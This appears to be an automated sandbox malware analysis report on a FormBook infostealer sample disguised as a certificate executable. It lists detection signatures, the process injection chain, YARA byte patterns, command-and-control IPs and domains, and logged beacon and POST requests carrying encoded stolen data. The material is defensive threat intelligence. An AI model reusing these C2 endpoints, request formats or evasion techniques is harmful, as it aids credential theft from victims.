Windows Analysis Report
Certificate 11-21AIS.exe

Overview

General Information

Sample name: Certificate 11-21AIS.exe
Analysis ID: 1560696
MD5: 8b68068b577b39f51dee9c3703ac8999
SHA1: bbfb3d4e750b119d142791bcd2c9cd174ea5f364
SHA256: 14b355ad5cf22181635d1c97b75288d9d3668aabd57558863ef1e795561274c7
Tags: exe, user-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Certificate 11-21AIS.exe (PID: 1900 cmdline: "C:\Users\user\Desktop\Certificate 11-21AIS.exe" MD5: 8B68068B577B39F51DEE9C3703AC8999)
    • svchost.exe (PID: 4320 cmdline: "C:\Users\user\Desktop\Certificate 11-21AIS.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • YpYSxBPTXgWuOtxBGIerqOSW.exe (PID: 3400 cmdline: "C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 2872 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • YpYSxBPTXgWuOtxBGIerqOSW.exe (PID: 5436 cmdline: "C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5304 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Certificate 11-21AIS.exe", CommandLine: "C:\Users\user\Desktop\Certificate 11-21AIS.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Certificate 11-21AIS.exe", ParentImage: C:\Users\user\Desktop\Certificate 11-21AIS.exe, ParentProcessId: 1900, ParentProcessName: Certificate 11-21AIS.exe, ProcessCommandLine: "C:\Users\user\Desktop\Certificate 11-21AIS.exe", ProcessId: 4320, ProcessName: svchost.exe
            Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Certificate 11-21AIS.exe", CommandLine: "C:\Users\user\Desktop\Certificate 11-21AIS.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Certificate 11-21AIS.exe", ParentImage: C:\Users\user\Desktop\Certificate 11-21AIS.exe, ParentProcessId: 1900, ParentProcessName: Certificate 11-21AIS.exe, ProcessCommandLine: "C:\Users\user\Desktop\Certificate 11-21AIS.exe", ProcessId: 4320, ProcessName: svchost.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-11-22T07:49:29.052437+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 154.215.72.110 | 80 | TCP
            2024-11-22T07:50:03.299040+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49752 | 116.50.37.244 | 80 | TCP
            2024-11-22T07:51:26.987114+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49805 | 85.159.66.93 | 80 | TCP
            2024-11-22T07:51:42.053332+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49974 | 91.195.240.94 | 80 | TCP
            2024-11-22T07:52:05.483779+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50019 | 66.29.149.46 | 80 | TCP
            2024-11-22T07:52:20.826825+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50023 | 195.110.124.133 | 80 | TCP
            2024-11-22T07:52:52.599727+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50027 | 217.196.55.202 | 80 | TCP

            AV Detection

            Source: http://www.elettrosistemista.zip/fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE= | Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/ | Avira URL Cloud: Label: malware
            Source: http://www.rssnewscast.com/fo8o/ | Avira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4= | Avira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/ | Avira URL Cloud: Label: malware
            Source: http://www.rssnewscast.com/fo8o/?Ml18S=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&nVb4=q2L0IduHqXQ8JBmp | Avira URL Cloud: Label: malware
            Source: Certificate 11-21AIS.exe | ReversingLabs: Detection: 60%
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4143880613.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4146974677.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4144988043.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4144911596.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1824475216.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: Certificate 11-21AIS.exe | Joe Sandbox ML: detected
            Source: Certificate 11-21AIS.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000002.4144260794.000000000098E000.00000002.00000001.01000000.00000004.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000000.1892574732.000000000098E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Certificate 11-21AIS.exe, 00000000.00000003.1686506113.0000000003850000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-21AIS.exe, 00000000.00000003.1687615785.0000000003700000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823927375.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823927375.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1734120490.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1735560481.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1823543961.0000000003223000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4145384785.000000000371E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4145384785.0000000003580000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1826364865.00000000033D2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Certificate 11-21AIS.exe, 00000000.00000003.1686506113.0000000003850000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-21AIS.exe, 00000000.00000003.1687615785.0000000003700000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1823927375.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823927375.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1734120490.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1735560481.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000003.00000003.1823543961.0000000003223000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4145384785.000000000371E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4145384785.0000000003580000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1826364865.00000000033D2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000003.1790454232.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823610810.0000000003000000.00000004.00000020.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000003.1760491789.000000000080C000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000003.00000002.4145972280.0000000003BAC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4143985977.000000000307E000.00000004.00000020.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.000000000343C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2118473608.000000002492C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000003.00000002.4145972280.0000000003BAC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4143985977.000000000307E000.00000004.00000020.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.000000000343C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2118473608.000000002492C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000003.1790454232.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823610810.0000000003000000.00000004.00000020.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000003.1760491789.000000000080C000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_00906CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00906CA9
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_009060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009060DD
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_009063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009063F9
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_0090EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0090EB60
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_0090F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0090F5FA
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_0090F56F FindFirstFileW,FindClose,0_2_0090F56F
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_00911B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00911B2F
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_00911C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00911C8A
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_00911F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00911F94
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_02BBBAB0 FindFirstFileW,FindNextFileW,FindClose,3_2_02BBBAB0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then xor eax, eax | 3_2_02BA9480
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then pop edi | 3_2_02BADD45
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then mov ebx, 00000004h | 3_2_033C053E

            Networking

            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49752 -> 116.50.37.244:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 154.215.72.110:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49805 -> 85.159.66.93:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49974 -> 91.195.240.94:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50019 -> 66.29.149.46:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50027 -> 217.196.55.202:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50023 -> 195.110.124.133:80
            Source: DNS query: www.joyesi.xyz
            Source: Joe Sandbox View | IP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox View | IP Address: 154.215.72.110 154.215.72.110
            Source: Joe Sandbox View | IP Address: 195.110.124.133 195.110.124.133
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_00914EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00914EB5
            Source: global traffic | HTTP traffic detected: GET /fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.3xfootball.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global traffic | HTTP traffic detected: GET /fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.goldenjade-travel.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global traffic | HTTP traffic detected: GET /fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.magmadokum.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global traffic | HTTP traffic detected: GET /fo8o/?Ml18S=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&nVb4=q2L0IduHqXQ8JBmp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.rssnewscast.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global traffic | HTTP traffic detected: GET /fo8o/?Ml18S=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&nVb4=q2L0IduHqXQ8JBmp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.techchains.info | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global traffic | HTTP traffic detected: GET /fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.elettrosistemista.zip | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global traffic | HTTP traffic detected: GET /fo8o/?Ml18S=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&nVb4=q2L0IduHqXQ8JBmp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.empowermedeco.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global traffic | DNS traffic detected: DNS query: www.3xfootball.com
            Source: global traffic | DNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global traffic | DNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global traffic | DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global traffic | DNS traffic detected: DNS query: www.magmadokum.com
            Source: global traffic | DNS traffic detected: DNS query: www.rssnewscast.com
            Source: global traffic | DNS traffic detected: DNS query: www.liangyuen528.com
            Source: global traffic | DNS traffic detected: DNS query: www.techchains.info
            Source: global traffic | DNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global traffic | DNS traffic detected: DNS query: www.donnavariedades.com
            Source: global traffic | DNS traffic detected: DNS query: www.660danm.top
            Source: global traffic | DNS traffic detected: DNS query: www.empowermedeco.com
            Source: global traffic | DNS traffic detected: DNS query: www.joyesi.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.k9vyp11no3.cfd
            Source: unknown | HTTP traffic detected: POST /fo8o/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Accept-Encoding: gzip, deflate, br | Host: www.goldenjade-travel.com | Origin: http://www.goldenjade-travel.com | Cache-Control: no-cache | Connection: close | Content-Type: application/x-www-form-urlencoded | Content-Length: 202 | Referer: http://www.goldenjade-travel.com/fo8o/ | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) | Data Ascii: Ml18S=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOdLNiKN5lnnYWjr0PUQifwrvJxZZMNmPWg==
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 22 Nov 2024 06:49:28 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Fri, 22 Nov 2024 06:49:53 GMT | Connection: close | Content-Length: 315 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=us-ascii | Server: Microsoft-HTTPAPI/2.0 | Date: Fri, 22 Nov 2024 06:49:57 GMT | Connection: close | Content-Length: 315 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
